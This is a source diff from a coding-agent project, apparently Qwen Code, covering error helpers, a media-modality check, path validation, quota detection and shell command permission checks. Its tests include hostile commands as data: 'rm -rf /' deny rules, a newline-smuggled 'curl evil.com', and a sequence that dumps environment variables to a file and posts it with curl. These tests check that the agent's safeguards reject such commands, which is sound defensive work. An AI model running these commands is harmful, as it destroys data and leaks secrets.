}], + }, + { role: 'user', parts: [{ text: 'Hello' }] }, + { role: 'model', parts: [{ text: 'Hi there' }] }, + ]; + + const result = stripStartupContext(history); + expect(result).toEqual([ + { role: 'user', parts: [{ text: 'Hello' }] }, + { role: 'model', parts: [{ text: 'Hi there' }] }, + ]); + }); + + it('should return history unchanged when no startup context is present', () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'Hello' }] }, + { role: 'model', parts: [{ text: 'Hi there' }] }, + ]; + + const result = stripStartupContext(history); + expect(result).toEqual(history); + }); + + it('should return empty array when history is only the startup context', () => { + const history: Content[] = [ + { role: 'user', parts: [{ text: 'This is the Qwen Code...' }] }, + { + role: 'model', + parts: [{ text: 'Got it. Thanks for the context!' }], + }, + ]; + + const result = stripStartupContext(history); + expect(result).toEqual([]); + }); + + it('should return history unchanged when it has fewer than 2 entries', () => { + expect(stripStartupContext([])).toEqual([]); + expect( + stripStartupContext([{ role: 'user', parts: [{ text: 'Hello' }] }]), + ).toEqual([{ role: 'user', parts: [{ text: 'Hello' }] }]); + }); + + it('should round-trip with getInitialChatHistory', async () => { + const mockConfig = { + getSkipStartupContext: vi.fn().mockReturnValue(false), + getWorkspaceContext: vi.fn().mockReturnValue({ + getDirectories: vi.fn().mockReturnValue(['/test/dir']), + }), + getFileService: vi.fn(), + }; + + const conversation: Content[] = [ + { role: 'user', parts: [{ text: 'Hello' }] }, + { role: 'model', parts: [{ text: 'Hi' }] }, + ]; + + const withStartup = await getInitialChatHistory( + mockConfig as unknown as Config, + conversation, + ); + const stripped = stripStartupContext(withStartup); + + expect(stripped).toEqual(conversation); + }); +}); diff --git a/packages/core/src/utils/environmentContext.ts 
b/packages/core/src/utils/environmentContext.ts index 4f5c03209..4d6fe0ab7 100644 --- a/packages/core/src/utils/environmentContext.ts +++ b/packages/core/src/utils/environmentContext.ts @@ -69,6 +69,8 @@ ${directoryContext} return [{ text: context }]; } +const STARTUP_CONTEXT_MODEL_ACK = 'Got it. Thanks for the context!'; + export async function getInitialChatHistory( config: Config, extraHistory?: Content[], @@ -87,8 +89,26 @@ export async function getInitialChatHistory( }, { role: 'model', - parts: [{ text: 'Got it. Thanks for the context!' }], + parts: [{ text: STARTUP_CONTEXT_MODEL_ACK }], }, ...(extraHistory ?? []), ]; } + +/** + * Strip the leading startup context (env-info user message + model ack) + * from a chat history. Used when forwarding a parent session's history + * to a child agent that will generate its own startup context for its + * own working directory. + */ +export function stripStartupContext(history: Content[]): Content[] { + if (history.length < 2) return history; + + const secondEntry = history[1]; + const ackText = secondEntry?.parts?.[0]?.text; + if (secondEntry?.role === 'model' && ackText === STARTUP_CONTEXT_MODEL_ACK) { + return history.slice(2); + } + + return history; +} diff --git a/packages/core/src/utils/errors.ts b/packages/core/src/utils/errors.ts index b0ba031dd..790123508 100644 --- a/packages/core/src/utils/errors.ts +++ b/packages/core/src/utils/errors.ts @@ -38,6 +38,10 @@ export function isAbortError(error: unknown): boolean { export function getErrorMessage(error: unknown): string { if (error instanceof Error) { + const cause = error.cause; + if (cause instanceof Error && cause.message !== error.message) { + return `${error.message} (cause: ${cause.message})`; + } return error.message; } try { @@ -47,6 +51,80 @@ export function getErrorMessage(error: unknown): string { } } +/** + * Extracts the HTTP status code from an error object. + * + * Checks the following properties in order of priority: + * 1. 
`error.status` - OpenAI, Anthropic, Gemini SDK errors + * 2. `error.statusCode` - Some HTTP client libraries + * 3. `error.response.status` - Axios-style errors + * 4. `error.error.code` - Nested error objects + * + * @returns The HTTP status code (100-599), or undefined if not found. + */ +export function getErrorStatus(error: unknown): number | undefined { + if (typeof error !== 'object' || error === null) { + return undefined; + } + + const err = error as { + status?: unknown; + statusCode?: unknown; + response?: { status?: unknown }; + error?: { code?: unknown }; + }; + + const value = + err.status ?? err.statusCode ?? err.response?.status ?? err.error?.code; + + return typeof value === 'number' && value >= 100 && value <= 599 + ? value + : undefined; +} + +/** + * Extracts a descriptive error type string from an error object. + * + * Uses the error's constructor name (e.g. "APIConnectionError", + * "APIConnectionTimeoutError") which is more specific than the generic + * `.type` field. Falls back to `.type` for SDK errors that set it, + * then to `error.name`, then "unknown". + * + * For network errors, appends the cause code (e.g. "ECONNREFUSED") + * when available. + * + * @returns A string identifying the error type. + */ +export function getErrorType(error: unknown): string { + if (typeof error !== 'object' || error === null) { + return 'unknown'; + } + + // Prefer the constructor name — SDK subclasses like APIConnectionError, + // RateLimitError etc. have meaningful names. + const constructorName = + error instanceof Error && error.constructor.name !== 'Error' + ? error.constructor.name + : undefined; + + // .type is set by OpenAI SDK (e.g. "invalid_request_error") + const sdkType = (error as { type?: string }).type; + + const baseType = + constructorName ?? + sdkType ?? + (error instanceof Error ? error.name : 'unknown'); + + // For network errors, append the cause code (e.g. ECONNREFUSED, ETIMEDOUT) + const cause = error instanceof Error ? 
error.cause : undefined; + const causeCode = + cause && typeof cause === 'object' && 'code' in cause + ? (cause as { code?: string }).code + : undefined; + + return causeCode ? `${baseType}:${causeCode}` : baseType; +} + export class FatalError extends Error { constructor( message: string, diff --git a/packages/core/src/utils/fileUtils.test.ts b/packages/core/src/utils/fileUtils.test.ts index 0daa68c4e..b2210c3ec 100644 --- a/packages/core/src/utils/fileUtils.test.ts +++ b/packages/core/src/utils/fileUtils.test.ts @@ -59,6 +59,10 @@ describe('fileUtils', () => { getTruncateToolOutputThreshold: () => 2500, getTruncateToolOutputLines: () => 500, getTargetDir: () => tempRootDir, + getModel: () => 'qwen3.5-plus', + getContentGeneratorConfig: () => ({ + modalities: { image: true, video: true }, + }), getFileSystemService: () => fsService, } as unknown as Config; @@ -891,29 +895,73 @@ describe('fileUtils', () => { expect(result.returnDisplay).toContain('Read image file: image.png'); }); - it('should process a PDF file', async () => { + it('should reject image files when model does not support image', async () => { + const fakePngData = Buffer.from('fake png data'); + actualNodeFs.writeFileSync(testImageFilePath, fakePngData); + mockMimeGetType.mockReturnValue('image/png'); + + const mockConfigNoImage = { + ...mockConfig, + getContentGeneratorConfig: () => ({ modalities: {} }), + } as unknown as Config; + + const result = await processSingleFileContent( + testImageFilePath, + mockConfigNoImage, + ); + expect(typeof result.llmContent).toBe('string'); + expect(result.llmContent).toContain('Unsupported image file'); + expect(result.llmContent).toContain('does not support image input'); + expect(result.returnDisplay).toContain('Skipped image file'); + }); + + it('should reject PDF files when model does not support PDF', async () => { const fakePdfData = Buffer.from('fake pdf data'); actualNodeFs.writeFileSync(testPdfFilePath, fakePdfData); 
mockMimeGetType.mockReturnValue('application/pdf'); + + const mockConfigNoPdf = { + ...mockConfig, + getContentGeneratorConfig: () => ({ + modalities: { image: true }, + }), + } as unknown as Config; + const result = await processSingleFileContent( testPdfFilePath, - mockConfig, + mockConfigNoPdf, ); - expect( - (result.llmContent as { inlineData: unknown }).inlineData, - ).toBeDefined(); + expect(typeof result.llmContent).toBe('string'); + expect(result.llmContent).toContain('Unsupported pdf file'); + expect(result.llmContent).toContain( + 'does not support PDF input directly', + ); + expect(result.llmContent).toContain('/extensions install'); + expect(result.returnDisplay).toContain('Skipped pdf file'); + }); + + it('should accept PDF files when model supports PDF', async () => { + const fakePdfData = Buffer.from('fake pdf data'); + actualNodeFs.writeFileSync(testPdfFilePath, fakePdfData); + mockMimeGetType.mockReturnValue('application/pdf'); + + const mockConfigWithPdf = { + ...mockConfig, + getContentGeneratorConfig: () => ({ + modalities: { image: true, pdf: true }, + }), + } as unknown as Config; + + const result = await processSingleFileContent( + testPdfFilePath, + mockConfigWithPdf, + ); + expect(result.llmContent).toHaveProperty('inlineData'); expect( (result.llmContent as { inlineData: { mimeType: string } }).inlineData .mimeType, ).toBe('application/pdf'); - expect( - (result.llmContent as { inlineData: { data: string } }).inlineData.data, - ).toBe(fakePdfData.toString('base64')); - expect( - (result.llmContent as { inlineData: { displayName?: string } }) - .inlineData.displayName, - ).toBe('document.pdf'); - expect(result.returnDisplay).toContain('Read pdf file: document.pdf'); + expect(result.returnDisplay).toContain('Read pdf file'); }); it('should read an SVG file as text when under 1MB', async () => { diff --git a/packages/core/src/utils/fileUtils.ts b/packages/core/src/utils/fileUtils.ts index 41029138e..8eefc0880 100644 --- 
a/packages/core/src/utils/fileUtils.ts +++ b/packages/core/src/utils/fileUtils.ts @@ -18,6 +18,7 @@ import { ToolErrorType } from '../tools/tool-error.js'; import { BINARY_EXTENSIONS } from './ignorePatterns.js'; import type { Config } from '../config/config.js'; import { createDebugLogger } from './debugLogger.js'; +import type { InputModalities } from '../core/contentGenerator.js'; import { detectEncodingFromBuffer } from './systemEncoding.js'; const debugLogger = createDebugLogger('FILE_UTILS'); @@ -227,7 +228,7 @@ export async function readFileWithEncodingInfo( return { content: full.toString('utf8'), encoding: 'utf-8', bom: false }; } - // Not valid UTF-8 — try chardet-based encoding detection + // Not valid UTF-8 — try chardet statistical detection const detected = detectEncodingFromBuffer(full); if (detected && !isUtf8CompatibleEncoding(detected)) { try { @@ -507,6 +508,42 @@ export interface ProcessedFileReadResult { linesShown?: [number, number]; // For text files [startLine, endLine] (1-based for display) } +/** + * For media file types, returns the corresponding modality key. + * Returns undefined for non-media types (text, binary, svg) which are always supported. + */ +function mediaModalityKey( + fileType: 'image' | 'pdf' | 'audio' | 'video' | 'text' | 'binary' | 'svg', +): keyof InputModalities | undefined { + if ( + fileType === 'image' || + fileType === 'pdf' || + fileType === 'audio' || + fileType === 'video' + ) { + return fileType; + } + return undefined; +} + +/** + * Build the same unsupported-modality message used by the converter, + * so the LLM sees a consistent hint regardless of where the check fires. + */ +function unsupportedModalityMessage( + modality: string, + displayName: string, +): string { + let hint: string; + if (modality === 'pdf') { + hint = + 'This model does not support PDF input directly. The read_file tool cannot extract PDF content either. 
To extract text from the PDF file, try using skills if applicable, or guide user to install pdf skill by running this slash command:\n/extensions install https://github.com/anthropics/skills:document-skills'; + } else { + hint = `This model does not support ${modality} input. The read_file tool cannot process this type of file either. To handle this file, try using skills if applicable, or any tools installed at system wide, or let the user know you cannot process this type of file.`; + } + return `[Unsupported ${modality} file: "${displayName}". ${hint}]`; +} + /** * Reads and processes a single file, handling text, images, and PDFs. * @param filePath Absolute path to the file. @@ -561,6 +598,26 @@ export async function processSingleFileContent( .replace(/\\/g, '/'); const displayName = path.basename(filePath); + + // Check modality support for media files using the resolved config + // (same source of truth the converter uses at API-call time). + const modality = mediaModalityKey(fileType); + if (modality) { + const modalities: InputModalities = + config.getContentGeneratorConfig()?.modalities ?? {}; + if (!modalities[modality]) { + const message = unsupportedModalityMessage(modality, displayName); + debugLogger.warn( + `Model '${config.getModel()}' does not support ${modality} input. ` + + `Skipping file: ${relativePathForDisplay}`, + ); + return { + llmContent: message, + returnDisplay: `Skipped ${fileType} file: ${relativePathForDisplay} (model doesn't support ${modality} input)`, + }; + } + } + switch (fileType) { case 'binary': { return { diff --git a/packages/core/src/utils/gitUtils.ts b/packages/core/src/utils/gitUtils.ts index e63b6bebd..493c89bd6 100644 --- a/packages/core/src/utils/gitUtils.ts +++ b/packages/core/src/utils/gitUtils.ts @@ -88,3 +88,61 @@ export const getGitBranch = (cwd: string): string | undefined => { return undefined; } }; + +/** + * Gets the git repository full name (owner/repo), if in a git repository. 
+ * Tries to get the name from the remote URL first, then falls back to the directory name. + */ +export const getGitRepoName = (cwd: string): string | undefined => { + try { + // Try to get the repository name from the remote URL + const remoteUrl = execSync('git remote get-url origin', { + cwd, + encoding: 'utf8', + stdio: ['pipe', 'pipe', 'pipe'], + }).trim(); + + if (remoteUrl) { + // Extract owner/repo from various URL formats: + // - https://github.com/owner/repo.git -> owner/repo + // - git@github.com:owner/repo.git -> owner/repo + // - https://gitlab.com/owner/repo -> owner/repo + // - https://github.com/owner/repo/extra -> owner/repo (ignore extra path) + + // Handle SSH format: git@host.com:owner/repo.git + let normalizedUrl = remoteUrl; + if (remoteUrl.startsWith('git@')) { + normalizedUrl = remoteUrl.replace(/^git@[^:]+:/, 'https://host.com/'); + } + + try { + const url = new URL(normalizedUrl); + // Remove .git suffix and split path + const pathParts = url.pathname + .replace(/\.git$/, '') + .split('/') + .filter(Boolean); + if (pathParts.length >= 2) { + // Return owner/repo format + return `${pathParts[0]}/${pathParts[1]}`; + } + } catch { + // URL parsing failed, try regex fallback + const match = remoteUrl.match(/[:/]([^/]+)\/([^/]+?)(?:\.git)?$/); + if (match && match[1] && match[2]) { + return `${match[1]}/${match[2]}`; + } + } + } + } catch { + // Fall back to directory name if remote URL is not available + } + + // Fallback: use the directory name of the git root + const gitRoot = findGitRoot(cwd); + if (gitRoot) { + return path.basename(gitRoot); + } + + return undefined; +}; diff --git a/packages/core/src/utils/pathReader.test.ts b/packages/core/src/utils/pathReader.test.ts index 282a7d6d1..97717d0a3 100644 --- a/packages/core/src/utils/pathReader.test.ts +++ b/packages/core/src/utils/pathReader.test.ts @@ -31,6 +31,9 @@ const createMockConfig = ( getFileService: () => mockFileService, getTruncateToolOutputThreshold: () => 2500, 
getTruncateToolOutputLines: () => 500, + getContentGeneratorConfig: () => ({ + modalities: { image: true, pdf: true, audio: true, video: true }, + }), } as unknown as Config; }; diff --git a/packages/core/src/utils/paths.ts b/packages/core/src/utils/paths.ts index dc4434ece..6067c5dc4 100644 --- a/packages/core/src/utils/paths.ts +++ b/packages/core/src/utils/paths.ts @@ -241,6 +241,10 @@ export function isSubpath(parentPath: string, childPath: string): boolean { ); } +export function isSubpaths(parentPath: string[], childPath: string): boolean { + return parentPath.some((p) => isSubpath(p, childPath)); +} + /** * Resolves a path with tilde (~) expansion and relative path resolution. * Handles tilde expansion for home directory and resolves relative paths @@ -272,6 +276,13 @@ export interface PathValidationOptions { * If true, allows both files and directories. If false (default), only allows directories. */ allowFiles?: boolean; + + /** + * If true, allows paths outside the workspace boundaries. + * The caller is responsible for adjusting permissions (e.g. 'ask') for + * external paths. + */ + allowExternalPaths?: boolean; } /** @@ -287,13 +298,22 @@ export function validatePath( resolvedPath: string, options: PathValidationOptions = {}, ): void { - const { allowFiles = false } = options; + const { allowFiles = false, allowExternalPaths = false } = options; const workspaceContext = config.getWorkspaceContext(); + const isWithinWorkspace = + workspaceContext.isPathWithinWorkspace(resolvedPath); - if (!workspaceContext.isPathWithinWorkspace(resolvedPath)) { + if (!allowExternalPaths && !isWithinWorkspace) { throw new Error('Path is not within workspace'); } + // For external paths where allowExternalPaths is true, skip filesystem checks. + // The path may not exist locally on the current machine, and permissions for + // external paths are handled at runtime rather than at validation time. 
+ if (allowExternalPaths && !isWithinWorkspace) { + return; + } + try { const stats = fs.statSync(resolvedPath); if (!allowFiles && !stats.isDirectory()) { diff --git a/packages/core/src/utils/quotaErrorDetection.test.ts b/packages/core/src/utils/quotaErrorDetection.test.ts index 01dccec24..0da986623 100644 --- a/packages/core/src/utils/quotaErrorDetection.test.ts +++ b/packages/core/src/utils/quotaErrorDetection.test.ts @@ -16,52 +16,55 @@ import { describe('quotaErrorDetection', () => { describe('isQwenQuotaExceededError', () => { - it('should detect insufficient_quota error message', () => { - const error = new Error('insufficient_quota'); - expect(isQwenQuotaExceededError(error)).toBe(true); - }); - - it('should detect free allocated quota exceeded error message', () => { - const error = new Error('Free allocated quota exceeded.'); - expect(isQwenQuotaExceededError(error)).toBe(true); - }); - - it('should detect quota exceeded error message', () => { - const error = new Error('quota exceeded'); - expect(isQwenQuotaExceededError(error)).toBe(true); - }); - - it('should detect quota exceeded in string error', () => { - const error = 'insufficient_quota'; - expect(isQwenQuotaExceededError(error)).toBe(true); - }); - - it('should detect quota exceeded in structured error', () => { - const error = { message: 'Free allocated quota exceeded.', status: 429 }; - expect(isQwenQuotaExceededError(error)).toBe(true); - }); - - it('should detect quota exceeded in API error', () => { - const error: ApiError = { - error: { - code: 429, - message: 'insufficient_quota', - status: 'RESOURCE_EXHAUSTED', - details: [], - }, + it('should detect the Qwen insufficient_quota error', () => { + const error = { + status: 429, + code: 'insufficient_quota', + message: 'Free allocated quota exceeded.', }; expect(isQwenQuotaExceededError(error)).toBe(true); }); - it('should not detect throttling errors as quota exceeded', () => { - const error = new Error('requests throttling triggered'); + 
it('should not match when status is not 429', () => { + const error = { + status: 400, + code: 'insufficient_quota', + message: 'Free allocated quota exceeded.', + }; expect(isQwenQuotaExceededError(error)).toBe(false); }); - it('should not detect unrelated errors', () => { - const error = new Error('Network error'); + it('should not match temporary throttling (concurrency 429)', () => { + const error = { + status: 429, + code: 'rate_limit_exceeded', + message: 'Rate limit exceeded', + }; expect(isQwenQuotaExceededError(error)).toBe(false); }); + + it('should not match paid account quota exceeded', () => { + const error = { + status: 429, + code: 'insufficient_quota', + message: 'You exceeded your current quota.', + }; + expect(isQwenQuotaExceededError(error)).toBe(false); + }); + + it('should not match plain Error objects', () => { + const error = new Error('insufficient_quota'); + expect(isQwenQuotaExceededError(error)).toBe(false); + }); + + it('should not match string errors', () => { + expect(isQwenQuotaExceededError('insufficient_quota')).toBe(false); + }); + + it('should not match null or undefined', () => { + expect(isQwenQuotaExceededError(null)).toBe(false); + expect(isQwenQuotaExceededError(undefined)).toBe(false); + }); }); describe('isProQuotaExceededError', () => { diff --git a/packages/core/src/utils/quotaErrorDetection.ts b/packages/core/src/utils/quotaErrorDetection.ts index 1c8af9cd3..87e50aa98 100644 --- a/packages/core/src/utils/quotaErrorDetection.ts +++ b/packages/core/src/utils/quotaErrorDetection.ts @@ -100,27 +100,20 @@ export function isGenericQuotaExceededError(error: unknown): boolean { } export function isQwenQuotaExceededError(error: unknown): boolean { - // Check for Qwen insufficient quota errors (should not retry) - const checkMessage = (message: string): boolean => { - const lowerMessage = message.toLowerCase(); - return ( - lowerMessage.includes('insufficient_quota') || - lowerMessage.includes('free allocated quota exceeded') || - 
(lowerMessage.includes('quota') && lowerMessage.includes('exceeded')) - ); + // Match the specific Qwen free-tier quota error to distinguish it from + // temporary throttling (429 due to concurrency) or paid account quota limits. + if (typeof error !== 'object' || error === null) { + return false; + } + const { status, code, message } = error as { + status?: number; + code?: string; + message?: string; }; - - if (typeof error === 'string') { - return checkMessage(error); - } - - if (isStructuredError(error)) { - return checkMessage(error.message); - } - - if (isApiError(error)) { - return checkMessage(error.error.message); - } - - return false; + return ( + status === 429 && + code === 'insufficient_quota' && + typeof message === 'string' && + message.toLowerCase().includes('free allocated quota exceeded') + ); } diff --git a/packages/core/src/utils/retry.test.ts b/packages/core/src/utils/retry.test.ts index a628719a5..a0e269950 100644 --- a/packages/core/src/utils/retry.test.ts +++ b/packages/core/src/utils/retry.test.ts @@ -7,7 +7,8 @@ /* eslint-disable @typescript-eslint/no-explicit-any */ import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; import type { HttpError } from './retry.js'; -import { getErrorStatus, retryWithBackoff } from './retry.js'; +import { retryWithBackoff } from './retry.js'; +import { getErrorStatus } from './errors.js'; import { setSimulate429 } from './testUtils.js'; import { AuthType } from '../core/contentGenerator.js'; @@ -312,7 +313,10 @@ describe('retryWithBackoff', () => { }); it('should throw immediately for Qwen OAuth with insufficient_quota message', async () => { - const errorWithInsufficientQuota = new Error('insufficient_quota'); + const errorWithInsufficientQuota = Object.assign( + new Error('Free allocated quota exceeded.'), + { status: 429, code: 'insufficient_quota' }, + ); const fn = vi.fn().mockRejectedValue(errorWithInsufficientQuota); @@ -330,8 +334,9 @@ describe('retryWithBackoff', () => { }); 
it('should throw immediately for Qwen OAuth with free allocated quota exceeded message', async () => { - const errorWithQuotaExceeded = new Error( - 'Free allocated quota exceeded.', + const errorWithQuotaExceeded = Object.assign( + new Error('Free allocated quota exceeded.'), + { status: 429, code: 'insufficient_quota' }, ); const fn = vi.fn().mockRejectedValue(errorWithQuotaExceeded); @@ -403,7 +408,10 @@ describe('retryWithBackoff', () => { }); it('should throw immediately for Qwen OAuth with quota message', async () => { - const errorWithQuota = new Error('quota exceeded'); + const errorWithQuota = Object.assign( + new Error('Free allocated quota exceeded.'), + { status: 429, code: 'insufficient_quota' }, + ); const fn = vi.fn().mockRejectedValue(errorWithQuota); diff --git a/packages/core/src/utils/retry.ts b/packages/core/src/utils/retry.ts index 5ce79f08f..e03a3d682 100644 --- a/packages/core/src/utils/retry.ts +++ b/packages/core/src/utils/retry.ts @@ -8,6 +8,7 @@ import type { GenerateContentResponse } from '@google/genai'; import { AuthType } from '../core/contentGenerator.js'; import { isQwenQuotaExceededError } from './quotaErrorDetection.js'; import { createDebugLogger } from './debugLogger.js'; +import { getErrorStatus } from './errors.js'; const debugLogger = createDebugLogger('RETRY'); @@ -151,38 +152,6 @@ export async function retryWithBackoff( throw new Error('Retry attempts exhausted'); } -/** - * Extracts the HTTP status code from an error object. - * - * Checks the following properties in order of priority: - * 1. `error.status` - OpenAI, Anthropic, Gemini SDK errors - * 2. `error.statusCode` - Some HTTP client libraries - * 3. `error.response.status` - Axios-style errors - * 4. `error.error.code` - Nested error objects - * - * @param error The error object. - * @returns The HTTP status code (100-599), or undefined if not found. 
- */ -export function getErrorStatus(error: unknown): number | undefined { - if (typeof error !== 'object' || error === null) { - return undefined; - } - - const err = error as { - status?: unknown; - statusCode?: unknown; - response?: { status?: unknown }; - error?: { code?: unknown }; - }; - - const value = - err.status ?? err.statusCode ?? err.response?.status ?? err.error?.code; - - return typeof value === 'number' && value >= 100 && value <= 599 - ? value - : undefined; -} - /** * Extracts the Retry-After delay from an error object's headers. * @param error The error object. diff --git a/packages/core/src/utils/shell-utils.test.ts b/packages/core/src/utils/shell-utils.test.ts index b974bfd5a..7a02ba4a7 100644 --- a/packages/core/src/utils/shell-utils.test.ts +++ b/packages/core/src/utils/shell-utils.test.ts @@ -44,8 +44,8 @@ beforeEach(() => { mockParse.mockImplementation((cmd: string) => cmd.split(' ')); config = { getCoreTools: () => [], - getExcludeTools: () => [], - getAllowedTools: () => [], + getPermissionsDeny: () => [], + getPermissionsAllow: () => [], } as unknown as Config; }); @@ -75,7 +75,7 @@ describe('isCommandAllowed', () => { }); it('should block a command if it is in the blocked list', () => { - config.getExcludeTools = () => ['ShellTool(rm -rf /)']; + config.getPermissionsDeny = () => ['ShellTool(rm -rf /)']; const result = isCommandAllowed('rm -rf /', config); expect(result.allowed).toBe(false); expect(result.reason).toBe( @@ -85,7 +85,7 @@ describe('isCommandAllowed', () => { it('should prioritize the blocklist over the allowlist', () => { config.getCoreTools = () => ['ShellTool(rm -rf /)']; - config.getExcludeTools = () => ['ShellTool(rm -rf /)']; + config.getPermissionsDeny = () => ['ShellTool(rm -rf /)']; const result = isCommandAllowed('rm -rf /', config); expect(result.allowed).toBe(false); expect(result.reason).toBe( @@ -100,7 +100,7 @@ describe('isCommandAllowed', () => { }); it('should block any command when a wildcard is in 
excludeTools', () => { - config.getExcludeTools = () => ['run_shell_command']; + config.getPermissionsDeny = () => ['run_shell_command']; const result = isCommandAllowed('any random command', config); expect(result.allowed).toBe(false); expect(result.reason).toBe( @@ -110,7 +110,7 @@ describe('isCommandAllowed', () => { it('should block a command on the blocklist even with a wildcard allow', () => { config.getCoreTools = () => ['ShellTool']; - config.getExcludeTools = () => ['ShellTool(rm -rf /)']; + config.getPermissionsDeny = () => ['ShellTool(rm -rf /)']; const result = isCommandAllowed('rm -rf /', config); expect(result.allowed).toBe(false); expect(result.reason).toBe( @@ -128,7 +128,7 @@ describe('isCommandAllowed', () => { }); it('should block a chained command if any part is blocked', () => { - config.getExcludeTools = () => ['run_shell_command(rm)']; + config.getPermissionsDeny = () => ['run_shell_command(rm)']; const result = isCommandAllowed('echo "hello" && rm -rf /', config); expect(result.allowed).toBe(false); expect(result.reason).toBe( @@ -298,7 +298,7 @@ describe('checkCommandPermissions', () => { }); it('should return a detailed failure object for a blocked command', () => { - config.getExcludeTools = () => ['ShellTool(rm)']; + config.getPermissionsDeny = () => ['ShellTool(rm)']; const result = checkCommandPermissions('rm -rf /', config); expect(result).toEqual({ allAllowed: false, @@ -364,7 +364,7 @@ describe('checkCommandPermissions', () => { }); it('should block a command on the sessionAllowlist if it is also globally blocked', () => { - config.getExcludeTools = () => ['run_shell_command(rm)']; + config.getPermissionsDeny = () => ['run_shell_command(rm)']; const result = checkCommandPermissions( 'rm -rf /', config, diff --git a/packages/core/src/utils/shell-utils.ts b/packages/core/src/utils/shell-utils.ts index 1c839530f..f0cd2bb13 100644 --- a/packages/core/src/utils/shell-utils.ts +++ b/packages/core/src/utils/shell-utils.ts @@ -606,22 
+606,19 @@ export function detectCommandSubstitution(command: string): boolean { } /** - * Checks a shell command against security policies and allowlists. + * Checks a shell command against security policies and permission rules. * - * This function operates in one of two modes depending on the presence of - * the `sessionAllowlist` parameter: + * Uses PermissionManager (via config.getPermissionManager()) to evaluate each + * sub-command. The function operates in two modes: * - * 1. **"Default Deny" Mode (sessionAllowlist is provided):** This is the - * strictest mode, used for user-defined scripts like custom commands. - * A command is only permitted if it is found on the global `coreTools` - * allowlist OR the provided `sessionAllowlist`. It must not be on the - * global `excludeTools` blocklist. + * 1. **"Default Deny" Mode (sessionAllowlist is provided):** Used for + * user-defined scripts / custom commands. A command is only permitted if + * it is found in the allow rules OR the provided `sessionAllowlist`. + * Commands not explicitly allowed are treated as a soft denial. * - * 2. **"Default Allow" Mode (sessionAllowlist is NOT provided):** This mode - * is used for direct tool invocations (e.g., by the model). If a strict - * global `coreTools` allowlist exists, commands must be on it. Otherwise, - * any command is permitted as long as it is not on the `excludeTools` - * blocklist. + * 2. **"Default Allow" Mode (sessionAllowlist is NOT provided):** Used for + * direct tool invocations by the model. Commands with a 'deny' decision + * are hard-blocked; 'ask' requires confirmation; all others are allowed. * * @param command The shell command string to validate. * @param config The application configuration. 
@@ -656,8 +653,71 @@ export function checkCommandPermissions( params: { command: '' }, } as AnyToolInvocation & { params: { command: string } }; + const pm = config.getPermissionManager?.(); + + // When PermissionManager is available, use PM-based evaluation. + if (pm) { + const disallowedCommands: string[] = []; + + for (const cmd of commandsToValidate) { + // 1. Session allowlist always wins (checked first regardless of PM rules) + if (sessionAllowlist) { + invocation.params['command'] = cmd; + const isSessionAllowed = doesToolInvocationMatch( + 'run_shell_command', + invocation, + [...sessionAllowlist].flatMap((c) => + SHELL_TOOL_NAMES.map((name) => `${name}(${c})`), + ), + ); + if (isSessionAllowed) continue; + } + + const decision = pm.isCommandAllowed(cmd); + + if (decision === 'deny') { + return { + allAllowed: false, + disallowedCommands: [cmd], + blockReason: `Command '${cmd}' is blocked by permission rules`, + isHardDenial: true, + }; + } + + if (decision === 'allow') continue; + + // 'ask' → always requires confirmation + if (decision === 'ask') { + disallowedCommands.push(cmd); + continue; + } + + // 'default': behaviour depends on mode + if (sessionAllowlist !== undefined) { + // Default Deny mode: unrecognised commands require confirmation + disallowedCommands.push(cmd); + } + // Default Allow mode: not matched by any rule → allowed + } + + if (disallowedCommands.length > 0) { + return { + allAllowed: false, + disallowedCommands, + blockReason: `Command(s) require confirmation. Disallowed commands: ${disallowedCommands.map((c) => JSON.stringify(c)).join(', ')}`, + isHardDenial: false, + }; + } + + return { allAllowed: true, disallowedCommands: [] }; + } + + // ── Legacy fallback (no PermissionManager) ────────────────────────────── + // Used by SDK consumers that have not yet migrated to the permissions system, + // or in unit tests that mock only getCoreTools/getPermissionsDeny. + // 1. 
Blocklist Check (Highest Priority) - const excludeTools = config.getExcludeTools() || []; + const excludeTools = config.getPermissionsDeny() || []; const isWildcardBlocked = SHELL_TOOL_NAMES.some((name) => excludeTools.includes(name), ); diff --git a/packages/core/src/utils/shellAstParser.test.ts b/packages/core/src/utils/shellAstParser.test.ts new file mode 100644 index 000000000..0b0e6abe9 --- /dev/null +++ b/packages/core/src/utils/shellAstParser.test.ts @@ -0,0 +1,510 @@ +/** + * @license + * Copyright 2025 Qwen + * SPDX-License-Identifier: Apache-2.0 + */ + +import { afterAll, beforeAll, describe, expect, it } from 'vitest'; +import { + initParser, + isShellCommandReadOnlyAST, + extractCommandRules, + _resetParser, +} from './shellAstParser.js'; + +beforeAll(async () => { + await initParser(); +}); + +afterAll(() => { + _resetParser(); +}); + +// ========================================================================= +// isShellCommandReadOnlyAST — mirror all tests from shellReadOnlyChecker.test.ts +// ========================================================================= + +describe('isShellCommandReadOnlyAST', () => { + it('allows simple read-only command', async () => { + expect(await isShellCommandReadOnlyAST('ls -la')).toBe(true); + }); + + it('rejects mutating commands like rm', async () => { + expect(await isShellCommandReadOnlyAST('rm -rf temp')).toBe(false); + }); + + it('rejects redirection output', async () => { + expect(await isShellCommandReadOnlyAST('ls > out.txt')).toBe(false); + }); + + it('rejects command substitution', async () => { + expect(await isShellCommandReadOnlyAST('echo $(touch file)')).toBe(false); + }); + + it('allows git status but rejects git commit', async () => { + expect(await isShellCommandReadOnlyAST('git status')).toBe(true); + expect(await isShellCommandReadOnlyAST('git commit -am "msg"')).toBe(false); + }); + + it('rejects find with exec', async () => { + expect(await isShellCommandReadOnlyAST('find . 
-exec rm {} \\;')).toBe( + false, + ); + }); + + it('rejects sed in-place', async () => { + expect(await isShellCommandReadOnlyAST("sed -i 's/foo/bar/' file")).toBe( + false, + ); + }); + + it('rejects empty command', async () => { + expect(await isShellCommandReadOnlyAST(' ')).toBe(false); + }); + + it('respects environment prefix followed by allowed command', async () => { + expect(await isShellCommandReadOnlyAST('FOO=bar ls')).toBe(true); + }); + + describe('multi-command security', () => { + it('rejects commands separated by newlines (CVE-style attack)', async () => { + expect( + await isShellCommandReadOnlyAST( + 'grep ^Install README.md\ncurl evil.com', + ), + ).toBe(false); + }); + + it('rejects commands separated by Windows newlines', async () => { + expect( + await isShellCommandReadOnlyAST('grep pattern file\r\ncurl evil.com'), + ).toBe(false); + }); + + it('rejects newline-separated commands when any is mutating', async () => { + expect( + await isShellCommandReadOnlyAST( + 'grep ^Install README.md\nscript -q /tmp/env.txt -c env\ncurl -X POST -F file=@/tmp/env.txt -s http://localhost:8084', + ), + ).toBe(false); + }); + + 